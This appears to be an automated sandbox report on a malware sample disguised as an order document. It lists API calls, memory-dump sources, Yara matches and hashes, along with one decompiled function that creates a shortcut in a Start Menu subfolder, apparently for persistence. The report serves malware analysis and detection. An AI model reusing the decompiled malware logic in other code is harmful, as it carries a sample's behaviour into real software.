0x10001e24
0x10001e27
0x10001e30
0x10001e33
0x10001e36
0x10001e36
0x10001e38
0x10001e3b
0x10001e41
0x00000000
0x10001e41
0x10001e05
0x10001e07
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d86
0x10001d8c
0x10001d8f
0x10001d91
0x10001d91
0x10001d94
0x10001d98
0x10001da5
0x10001da7
0x10001dad
0x10001dad
0x10001dad
0x00000000
0x00000000
0x10001ee2
0x10001ee6
0x10001eeb
0x10001eee
0x10001e47
0x10001e47
0x10001e49
0x00000000
0x00000000
0x10001e4f
0x10001e4f
0x10001e53
0x10001e5a
0x10001e7e
0x10001e7e
0x10001e82
0x10001e84
0x10001e87
0x10001e87
0x10001e8a
0x10001e8a
0x00000000
0x10001e82
0x10001e5f
0x10001e62
0x10001e62
0x10001e69
0x10001e6b
0x10001e6e
0x10001e75
0x10001e76
0x10001e7c
0x10001e7c
0x00000000
0x10001e7c
0x10001e70
0x10001e73
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d7f
0x10001c41
0x10001c41
0x10001c42
0x10001d67
0x00000000
0x10001d67
0x10001c48
0x10001c49
0x00000000
0x00000000
0x10001c51
0x10001c51
0x10001c54
0x10001c9f
0x00000000
0x10001c9f
0x10001c56
0x10001c56
0x10001c59
0x10001c83
0x10001c86
0x10001c89
0x10001d59
0x10001d59
0x10001d59
0x10001c8f
0x10001c8f
0x10001c8f
0x10001d5f
0x00000000
0x10001d5f
0x10001c5c
0x10001c5c
0x10001c5d
0x10001c80
0x10001c82
0x10001c82
0x00000000
0x10001c82
0x10001c5f
0x10001c5f
0x10001c62
0x10001c7c
0x00000000
0x10001c7c
0x10001c64
0x10001c64
0x10001c67
0x10001c78
0x00000000
0x10001c78
0x10001c69
0x10001c69
0x10001c6a
0x10001c74
0x00000000
0x10001c74
0x10001c6d
0x10001c6e
0x00000000
0x00000000
0x10001c70
0x00000000
0x10001c70
0x00000000
0x10001b20
0x10001ac3
0x10001ac6
0x10001af5
0x10001af9
0x10001b00
0x10001b07
0x10001b0a
0x10001b0d
0x00000000
0x10001b0d
0x10001ac8
0x10001ac9
0x10001ae4
0x10001aeb
0x10001aee
0x00000000
0x10001aee
0x10001ace
0x00000000
0x10001ad4
0x10001ad4
0x10001adb
0x00000000
0x10001adb
0x10001ace
0x10001cc4
0x10001cc9
0x10001cce
0x10001cd2
0x100020ef
0x100020f5
0x10001ce4
0x10001ce6
0x10001ce7
0x1000201a
0x1000201a
0x1000201d
0x10002020
0x1000203d
0x10002043
0x10002045
0x1000204b
0x10002062
0x10002062
0x10002062
0x1000206f
0x10002075
0x10002078
0x1000207e
0x10002080
0x10002083
0x10002085
0x1000208c
0x10002091
0x10002094
0x10002096
0x1000209b
0x100020ad
0x100020ad
0x1000209b
0x10002094
0x10002083
0x100020b3
0x100020b6
0x100020c0
0x100020c8
0x100020d4
0x100020da
0x100020dd
0x1000200f
0x1000200f
0x00000000
0x1000200f
0x100020e3
0x100020e9
0x100020e9
0x00000000
0x00000000
0x100020eb
0x100020eb
0x100020eb
0x100020eb
0x00000000
0x100020b8
0x100020b8
0x100020be
0x00000000
0x00000000
0x00000000
0x100020be
0x100020b6
0x1000204e
0x10002054
0x10002056
0x1000205c
0x00000000
0x00000000
0x00000000
0x1000205c
0x10002022
0x10002029
0x1000202f
0x10002035
0x00000000
0x10002035
0x10001ced
0x10001cee
0x10001ff9
0x10001ff9
0x10001fff
0x10002002
0x00000000
0x00000000
0x10002009
0x1000200e
0x00000000
0x1000200e
0x10001cf5
0x00000000
0x00000000
0x10001cfb
0x10001cfb
0x10001d04
0x10001d09
0x10001d0f
0x00000000
0x00000000
0x10001d15
0x10001d22
0x10001d28
0x10001d32
0x10001d38
0x10001d40
0x10001d50
0x00000000
0x10001d50

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020CB() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405A9E( *(_t111 - 0xc)) == 0) {
					E00402AC1(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408408, _t87, 1, 0x4083f8, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408418, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne\\Tilegnelserne\\Suppegrydernes79");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x004020d4
0x004020de
0x004020e8
0x004020f2
0x004020fd
0x00402100
0x0040211a
0x00402120
0x00402126
0x00402129
0x00402133
0x00402137
0x00402137
0x0040213c
0x0040214d
0x00402155
0x0040222e
0x0040222e
0x00402235
0x0040215b
0x0040215b
0x0040216a
0x0040216e
0x00402171
0x00402177
0x00402185
0x00402188
0x0040218a
0x00402195
0x00402195
0x0040219a
0x0040219c
0x004021a3
0x004021a3
0x004021a6
0x004021af
0x004021b2
0x004021b7
0x004021b9
0x004021c6
0x004021c6
0x004021c9
0x004021d2
0x004021d5
0x004021de
0x004021e4
0x004021eb
0x00402204
0x00402206
0x00402214
0x00402214
0x00402204
0x00402217
0x0040221d
0x0040221d
0x00402220
0x00402226
0x0040222c
0x00402241
0x00000000
0x00000000
0x00000000
0x0040222c
0x00402237
0x00402954
0x00402960

APIs

CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79, xrefs: 0040218D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79
API String ID: 123533781-2270803269
Opcode ID: 1de0a6610444ccfce012cd9757aba54bd57a6ab52e750509d87dd78bfa4fca60
Instruction ID: a4a7f3c5621d46c7608b395b9069b641d7403675325c7ae40bb0e4cab6624151
Opcode Fuzzy Hash: 1de0a6610444ccfce012cd9757aba54bd57a6ab52e750509d87dd78bfa4fca60
Instruction Fuzzy Hash: 89512475A00208BFCF10DFE4C988A9DBBB5EF88314F2045AAF915EB2D1DA799941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03506EBD Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

^ulH, xrefs: 03514326
xy]>, xrefs: 03513EF3
W`o, xrefs: 0351404F

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: W`o$^ulH$xy]>
API String ID: 0-3807756005
Opcode ID: 880dacf924cf13582ef930738241739b65e7ef28722d10dcc9654decf67b2515
Instruction ID: 005b04687a2317816f2b68c28d4fc73c922d5e5bd5063d8dd4cf1f90808c3d1d
Opcode Fuzzy Hash: 880dacf924cf13582ef930738241739b65e7ef28722d10dcc9654decf67b2515
Instruction Fuzzy Hash: B8B1DF6213CE591FF21CDB389CDA9BA23ABF7822203A5815ED083C71ABE475A8474165

Uniqueness

Uniqueness Score: -1.00%

Function 035003A5 Relevance: 3.0, Strings: 2, Instructions: 541COMMON

Download Yara Rule

Strings

M, xrefs: 035003A6
F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F$M
API String ID: 0-3168750181
Opcode ID: 9233e56989a9ae1f557784de530c944dbe096130875474cfd0c2d919c2e31ba7
Instruction ID: 8171dd14093ddf9f1ab9062032a9d733a8a257810634ac37aa2f3ba86b6e5151
Opcode Fuzzy Hash: 9233e56989a9ae1f557784de530c944dbe096130875474cfd0c2d919c2e31ba7
Instruction Fuzzy Hash: 18D18947E3EB1688E7D3B070A5417A19680FF27586F61CF1A9836B29F13B1F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 035004D4 Relevance: 3.0, Strings: 2, Instructions: 497COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A
6, xrefs: 035004EF

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: 6$F
API String ID: 0-2985313587
Opcode ID: 67c47bebe09af1a4f627adc65fa06e9a2df2ad78e8d5e55bee59924f30abe2cb
Instruction ID: 38360c75282e02fbbb0232665e4cb0bbf289034f24e1e5275a591aad6b454040
Opcode Fuzzy Hash: 67c47bebe09af1a4f627adc65fa06e9a2df2ad78e8d5e55bee59924f30abe2cb
Instruction Fuzzy Hash: 5DD19C47E3EB1689E7D3B070A5417A19680FF27186F21CF5A9836B25F13B2F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 0350A331 Relevance: 2.8, Strings: 2, Instructions: 293COMMON

Download Yara Rule

Strings

_k, xrefs: 0350A6AC
_, xrefs: 0350A434

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: _$_k
API String ID: 0-2677134695
Opcode ID: 5dd1c4120e4ad312cc7b2ae52fe72ed21834cf784242326a2fa7e1a3cd7e23a0
Instruction ID: 8056f1eefe1f6c1bd6e3e6d5ed7f589677b60fc0684defc3a3aff47799adedb5
Opcode Fuzzy Hash: 5dd1c4120e4ad312cc7b2ae52fe72ed21834cf784242326a2fa7e1a3cd7e23a0
Instruction Fuzzy Hash: DCC1127160438A8FCB34DE64DA983DA3776FF9A350F98417ECC995B651D3320A82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0350A3DE Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

_k, xrefs: 0350A6AC
_, xrefs: 0350A434

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: _$_k
API String ID: 0-2677134695
Opcode ID: fff841ebd89003d4ecdfd53076d426959f3e608959274624d5f5a014d3bd3355
Instruction ID: 982047b4b68c45302c99723c24b41b7b2290601b1f1b53a4dac3e54dd8d61912
Opcode Fuzzy Hash: fff841ebd89003d4ecdfd53076d426959f3e608959274624d5f5a014d3bd3355
Instruction Fuzzy Hash: F5B1117160438ACFCB399E64EA943DA3776FF9A350F58417ECC5A5B651D3320A82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03500119 Relevance: 1.9, Strings: 1, Instructions: 670COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 0fdb048e3237a3b908f7d08a564f4a713d8eb106a02d12f3448b3cedbcf4522b
Instruction ID: a4ef6b153f930b859b5dac7f5794ef6b3ea93e31b04c61b5986a2e579eb75563
Opcode Fuzzy Hash: 0fdb048e3237a3b908f7d08a564f4a713d8eb106a02d12f3448b3cedbcf4522b
Instruction Fuzzy Hash: C2F19847E3AB1689E6D3B070E5417A14680FF27592F21CF5A9826B35F2372F4B4E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03501916 Relevance: 1.9, Strings: 1, Instructions: 649COMMON

Download Yara Rule

Strings

h, xrefs: 0350397B

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 2a763eaba627116fdcfe153eea53e6883f2e2d38e5fa9cd4e41d5008b3fb519d
Instruction ID: 525c344efafbcf3442c1dbbb01acb7df07d329d5d1cc5661dd4d287933a6d539
Opcode Fuzzy Hash: 2a763eaba627116fdcfe153eea53e6883f2e2d38e5fa9cd4e41d5008b3fb519d
Instruction Fuzzy Hash: 6102416AD2E3058AD743E470E5453E56BE0FF07240F244F5AC866A25F2F71B4A4E4AC1

Uniqueness

Uniqueness Score: -1.00%

Function 03500013 Relevance: 1.9, Strings: 1, Instructions: 635COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 75f0ae9ec2a86beb7d5bb5ef9a47324b6647905843fb6809d7aa8ac5691de6dc
Instruction ID: b4845832ff8e85d8f95cfce3733b896124f4dde8447b70e38d0872fd250e4d6d
Opcode Fuzzy Hash: 75f0ae9ec2a86beb7d5bb5ef9a47324b6647905843fb6809d7aa8ac5691de6dc
Instruction Fuzzy Hash: 93F17847E3EB1689E7D3A070E5417A19680FF27586F21CF1A9826B29F1371F4B4E05D8

Uniqueness

Uniqueness Score: -1.00%

Function 03500050 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: c4898d397ad49474325bb18829ed073b7d0b67f0308783c5e5407113de61e0df
Instruction ID: 2226ce67fdfa68c1f572971f5505cd59665e2da2423cf42fbfa18b64f96bfd0b
Opcode Fuzzy Hash: c4898d397ad49474325bb18829ed073b7d0b67f0308783c5e5407113de61e0df
Instruction Fuzzy Hash: 72F17787E3EB1688E7D3A070E5517A19680FF27586F21CF169826B29F2371F4B4E05D8

Uniqueness

Uniqueness Score: -1.00%

Function 0350021D Relevance: 1.9, Strings: 1, Instructions: 626COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 46f0396a4d1c2143581640fb967a6ce2817f91ae5de8a7d496eeebf46ec135cb
Instruction ID: 4ebab5887c2e086a7905520dfede67b07f089c4d7583043508e720d4c1556a52
Opcode Fuzzy Hash: 46f0396a4d1c2143581640fb967a6ce2817f91ae5de8a7d496eeebf46ec135cb
Instruction Fuzzy Hash: 5CE17747E3AB1689E7D3B070E5417A59680FF27186F21CF1A9836B29F1372F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 03500001 Relevance: 1.9, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: f17b1813c09090f296332155b5638933917cba9835f6c91370b713dc1b619568
Instruction ID: acd0c36ff08bfa769ac265a10a8337fd9c152702dec2141031bb047a7389c545
Opcode Fuzzy Hash: f17b1813c09090f296332155b5638933917cba9835f6c91370b713dc1b619568
Instruction Fuzzy Hash: 14F16787E3EB1688E6D3A070E5417A15680FF27586F21CF569826B29F2371F4B4E05D8

Uniqueness

Uniqueness Score: -1.00%

Function 035000D3 Relevance: 1.9, Strings: 1, Instructions: 617COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 8e39ba85c57d6ea7786ecd8068640468dddd84d20f656d9e7fd830f6181a5a16
Instruction ID: 4ced9d2cf28d2bebbe71118ef231b9b6ed5f0db8d852118ead24a60b4b2339cb
Opcode Fuzzy Hash: 8e39ba85c57d6ea7786ecd8068640468dddd84d20f656d9e7fd830f6181a5a16
Instruction Fuzzy Hash: B4F17847E3EB1689E7D3B070E5417A19680FF27586F21CF169826B29F1372F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 0350015C Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 8f527cac32d53359e2cbbfc60d47635eabed4e39ea119b6989e2ea966bf59dba
Instruction ID: ba9e487e64ad7efea5fd79a4586736eda963698205574773918cb17815b633c9
Opcode Fuzzy Hash: 8f527cac32d53359e2cbbfc60d47635eabed4e39ea119b6989e2ea966bf59dba
Instruction Fuzzy Hash: 1BE17847E3EB1689E7D3B070E5417A19680FF27586F21CF1A9826B29F1371F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 03500260 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 4976e3938c0bce7dea656aed9d82e73149b5b038ce590a213a09cb07df1d1c0b
Instruction ID: bf1a2f1f0df3364b703a051f433ba2b0cc8c8b3513419091ec0b672b7e202423
Opcode Fuzzy Hash: 4976e3938c0bce7dea656aed9d82e73149b5b038ce590a213a09cb07df1d1c0b
Instruction Fuzzy Hash: 18E18747E3EB1689E7D3B070A5417A19A80FF27186F21CF1A9836B29F1371F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 035001D7 Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: ee0bd0a2f04df6e2fce621158adbb5a17a71fce4bac7736d13c0735611658b56
Instruction ID: 1e6f9770e5ac9cd8ad6a3c98b0f959bace1160f2d0b49f62f1a0622b240e8676
Opcode Fuzzy Hash: ee0bd0a2f04df6e2fce621158adbb5a17a71fce4bac7736d13c0735611658b56
Instruction Fuzzy Hash: 23E17847E3EB1689E7D3B070E5417A19A80FF27586F21CF1A9826B29F1371F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 0350018E Relevance: 1.8, Strings: 1, Instructions: 583COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 8635bad7fd82b8836f8c905552df6bd67c8097fe18d0b5bfa06af5f027401d31
Instruction ID: 357142ddbd036081440c3c9df8ae32457ced2ad6b56860008d1c78578a1e9945
Opcode Fuzzy Hash: 8635bad7fd82b8836f8c905552df6bd67c8097fe18d0b5bfa06af5f027401d31
Instruction Fuzzy Hash: 54E18747E3AB1688E7D3B070E5417A59A80FF27586F21CF1A9826B29F1371F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 035002D6 Relevance: 1.8, Strings: 1, Instructions: 579COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 23e8e29dc8be43652842fc234f175c2dbfb7af901ff386542a63fa59814d243e
Instruction ID: 5d578fb3b654790f14f4641b8054cf27b86539b991d86891c1cd1136bc11ff20
Opcode Fuzzy Hash: 23e8e29dc8be43652842fc234f175c2dbfb7af901ff386542a63fa59814d243e
Instruction Fuzzy Hash: E7E19947E3EB1689E7D3B070A5417A59A80FF27186F21CF1A9836B29F1371F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 03500299 Relevance: 1.8, Strings: 1, Instructions: 565COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: c943bc052596c95fcb74b77603ef8668b67241f194402565c165848a04dc8ff8
Instruction ID: c203bcc3e008e8d7c452be9912ca996e445c5c575b9a0241eab60c54bf6abe21
Opcode Fuzzy Hash: c943bc052596c95fcb74b77603ef8668b67241f194402565c165848a04dc8ff8
Instruction Fuzzy Hash: 33E18747E3BB1689E7D3B070A5417A59680FF27586F21CF1A9836B29F13B1F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

